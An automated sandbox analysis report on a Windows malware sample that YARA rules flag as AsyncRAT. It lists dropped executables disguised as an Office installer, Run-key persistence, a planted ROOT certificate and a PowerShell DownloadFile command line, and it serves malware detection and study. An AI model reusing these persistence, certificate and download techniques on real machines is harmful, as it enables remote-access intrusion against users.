Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\Gm602axA2d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe

File written: C:\Users\user\AppData\Local\Temp\Office Installer.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe

File opened: C:\Windows\system32\MSFTEDIT.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe

Window detected: Number of UI elements: 13

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration

Jump to behavior

Source: Gm602axA2d.exe

Static file information: File size 19303424 > 1048576

Source: Gm602axA2d.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1222000

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"			Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 16.2.Lxfrfbi.exe.57849f8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.77517a8.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.52049f8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.6e917a8.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.73817c8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7291788.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.7701788.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.7701788.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.31fb2c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7291788.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3a87008.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3a87008.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.72e17a8.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.4ef49f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.6e41788.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.350ae90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.6e41788.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.6f317c8.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.31fb2c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.77f17c8.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7a90000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.350ae90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2181412356.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2248433326.0000000007751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2181412356.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2214020576.0000000005784000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2114944613.0000000004EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2181412356.0000000006F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1818612437.0000000007169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1729748988.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2248433326.0000000007701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2248433326.00000000077F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2070694207.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

Source: Office Installer.exe.0.dr	Static PE information: section name: .gehcont
Source: Office Installer.exe.0.dr	Static PE information: section name: .00cfg
Source: Office Installer.exe.0.dr	Static PE information: section name: .gxfg
Source: Office Installer.exe.0.dr	Static PE information: section name: _RDATA
Source: Office Installer.exe.0.dr	Static PE information: section name: .debug_l
Source: Office Installer.exe.0.dr	Static PE information: section name: .debug_i
Source: Office Installer.exe.0.dr	Static PE information: section name: .debug_a
Source: Office Installer.exe.0.dr	Static PE information: section name: .debug_a
Source: Office Installer.exe.0.dr	Static PE information: section name: .debug_s
Source: Office Installer.exe.0.dr	Static PE information: section name: .debug_f
Source: Office Installer.exe.0.dr	Static PE information: section name: .modplug

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0520636B pushad ; ret	1_2_05206371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_05206F11 pushad ; ret	1_2_05206F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07D33D5E push FFFFFF8Bh; iretd	1_2_07D33D6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B9F0973 push E95B66D0h; ret	8_2_00007FFD9B9F09C9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_081B3DA9 pushad ; ret	12_2_081B3DAC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AF8465 push ebx; retf	16_2_07AF8492
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07B82E5F pushfd ; retf	16_2_07B82E60
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07B80AA7 pushad ; ret	16_2_07B80AB1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Tries to download and execute files (via powershell)

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"			Jump to behavior

Source: C:\Users\user\Desktop\Gm602axA2d.exe	File created: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	File created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Gm602axA2d.exe	File created: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfrfbi			Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfrfbi			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
